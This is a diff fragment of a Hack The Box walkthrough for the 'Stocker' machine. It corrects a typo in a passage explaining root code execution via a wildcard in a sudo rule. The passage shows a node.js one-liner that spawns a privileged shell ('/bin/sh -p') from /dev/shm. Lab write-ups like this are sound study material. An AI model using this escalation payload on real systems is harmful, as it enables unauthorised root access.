blnknlights/blnknlights.github.io/htb/machines/stocker/stocker.md

 ## Code execution as root due to globing in the sudo line

-So because of the globing we can do some directory traversal with that, we just have to drop a node.js script that will drop a shell and preserver privileges:
+So because of the globing we can do some directory traversal with that, we just have to drop a node.js script that will drop a shell and preserve root privileges:
 ```bash
 angoose@stocker:/usr/local/scripts$ cat /dev/shm/test.js
 require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})